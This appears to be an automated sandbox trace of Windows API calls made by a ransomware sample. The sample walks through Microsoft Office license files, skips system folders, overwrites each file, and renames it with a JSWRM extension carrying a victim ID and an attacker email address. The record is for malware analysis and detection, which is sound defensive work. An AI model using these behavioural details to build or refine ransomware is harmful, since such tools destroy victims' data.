[0103.971] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3080, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x3080, lpOverlapped=0x0) returned 1 [0103.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.972] CloseHandle (hObject=0x45c) returned 1 [0103.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0103.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0103.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0103.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0103.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0103.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0103.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.972] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_KMS_Automation-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_kms_automation-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_KMS_Automation-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_kms_automation-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0103.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0103.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0103.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.973] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe49fedb3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe49fedb3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4a97702, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d65, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_KMS_Automation-ul-oob.xrm-ms", cAlternateFileName="MONDOR~2.XRM")) returned 1 [0103.973] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.973] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.973] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.973] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.973] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.973] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.973] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.973] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.973] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.973] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0103.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_KMS_Automation-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_KMS_Automation-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_KMS_Automation-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0103.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0103.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_KMS_Automation-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_KMS_Automation-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22ce70, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_KMS_Automation-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0103.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0103.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0103.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0103.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_KMS_Automation-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_kms_automation-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.974] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11621) returned 1 [0103.974] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0103.974] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0103.976] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.976] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0103.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.977] CloseHandle (hObject=0x45c) returned 1 [0103.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0103.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0103.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0103.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0103.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0103.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0103.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0103.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0103.977] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_KMS_Automation-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_kms_automation-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_KMS_Automation-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_kms_automation-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0103.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0103.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0103.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.978] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4ae3c90, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4ae3c90, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4bc8a97, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x258d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_KMS_Automation-ul.xrm-ms", cAlternateFileName="MOFD63~1.XRM")) returned 1 [0103.978] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul.xrm-ms", lpString2=".") returned 1 [0103.978] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul.xrm-ms", lpString2="..") returned 1 [0103.978] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul.xrm-ms", lpString2="...") returned 1 [0103.978] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul.xrm-ms", lpString2="windows") returned -1 [0103.978] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul.xrm-ms", lpString2="recovery") returned -1 [0103.978] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul.xrm-ms", lpString2="perflogs") returned -1 [0103.978] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul.xrm-ms", lpString2="documents and settings") returned 1 [0103.978] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.978] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul.xrm-ms", lpString2="system volume information") returned -1 [0103.978] lstrcmpiW (lpString1="MondoR_KMS_Automation-ul.xrm-ms", lpString2="msocache") returned -1 [0103.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0103.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_KMS_Automation-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0103.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_KMS_Automation-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f70, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_KMS_Automation-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0103.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0103.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_KMS_Automation-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0103.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_KMS_Automation-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240ef8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_KMS_Automation-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0103.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0103.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0103.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0103.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_KMS_Automation-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_kms_automation-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.979] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9613) returned 1 [0103.979] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2580) returned 0x24c1d0 [0103.980] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2580, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2580, lpOverlapped=0x0) returned 1 [0103.981] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.982] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2580, lpOverlapped=0x0) returned 1 [0103.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.982] CloseHandle (hObject=0x45c) returned 1 [0103.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0103.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0103.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0103.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0103.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0103.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0103.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.982] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_KMS_Automation-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_kms_automation-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_KMS_Automation-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_kms_automation-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0103.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0103.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0103.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0103.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0103.983] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4c3b14f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4c3b14f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4d1ff59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_OEM_Perp-pl.xrm-ms", cAlternateFileName="MO8523~1.XRM")) returned 1 [0103.983] lstrcmpiW (lpString1="MondoR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0103.983] lstrcmpiW (lpString1="MondoR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0103.983] lstrcmpiW (lpString1="MondoR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0103.984] lstrcmpiW (lpString1="MondoR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0103.984] lstrcmpiW (lpString1="MondoR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0103.984] lstrcmpiW (lpString1="MondoR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.984] lstrcmpiW (lpString1="MondoR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.984] lstrcmpiW (lpString1="MondoR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.984] lstrcmpiW (lpString1="MondoR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.984] lstrcmpiW (lpString1="MondoR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned -1 [0103.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0103.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0103.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0103.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2411c8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0103.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0103.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0103.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0103.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0103.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240f20, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0103.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0103.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0103.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0103.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0103.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c 